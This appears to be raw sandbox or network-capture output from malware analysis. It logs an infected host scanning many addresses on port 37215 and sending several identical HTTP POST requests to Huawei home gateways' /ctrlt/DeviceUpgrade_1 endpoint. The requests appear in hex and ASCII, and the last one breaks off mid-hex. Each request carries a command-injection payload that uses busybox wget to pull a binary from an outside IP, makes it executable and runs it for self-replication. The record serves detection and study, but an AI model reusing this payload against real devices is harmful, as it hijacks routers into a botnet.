                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.132.98.132:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 149.157.92.16:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 213.199.74.86:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.33.79.231:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.79.248.134:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.211.38.218:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.96.191.48:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.84.185.125:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.15.230.21:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.152.93.123:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 129.20.199.73:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.208.70.151:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.169.9.154:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 114.172.77.114:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.250.167.41:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.106.215.1:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.195.17.246:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.121.110.5:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 181.241.193.199:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.171.72.163:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.163.5.223:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.2.163.219:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 52.148.117.84:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 154.7.158.36:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.124.151.95:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 88.227.163.161:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.16.20.166:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.56.98.93:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.103.146.31:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.88.111.68:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.31.77.205:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 123.21.83.215:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.0.177.19:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.95.182.105:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.73.201.53:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 202.116.141.116:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.80.154.146:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.213.229.21:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.138.212.251:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.86.117.64:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.144.141.189:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.82.49.47:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.99.207.244:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.36.106.162:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 68.167.0.57:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.168.42.164:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.83.73.123:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.70.235.253:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.77.109.254:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 174.115.244.95:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.160.156.49:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.31.190.63:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.182.204.180:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.103.207.93:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.125.158.232:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 89.78.10.110:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.11.239.148:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.190.184.173:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 73.101.145.240:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.36.157.115:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.83.69.164:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.135.96.216:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 96.106.11.16:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.94.11.186:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.60.223.99:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.237.129.112:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.79.55.82:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.181.197.198:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.62.145.99:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.71.92.250:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.242.37.198:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.222.248.184:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.154.39.9:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 81.248.74.146:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 54.135.243.118:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.12.77.26:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.30.22.113:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.159.91.18:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 19.12.63.247:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.158.124.205:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.100.184.235:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.133.216.121:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.122.156.147:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.175.33.170:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.254.50.117:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.176.233.18:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 209.42.232.104:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.12.184.96:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 76.116.2.201:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.244.152.99:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.108.26.153:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.36.73.144:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.83.166.17:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.111.119.42:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.245.191.29:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 197.204.62.77:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 12.225.247.90:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 46.183.5.78:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.165.200.1:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 41.196.193.149:37215
                Source: global trafficTCP traffic: 192.168.2.15:14150 -> 157.107.164.216:37215
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.55 -l /tmp/.oxy -r /xd_/cyber-mpsl; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 465Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 35 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 78 64 5f 2f 63 79 62 65 72 2d 6d 70 73 6c 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f 78 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 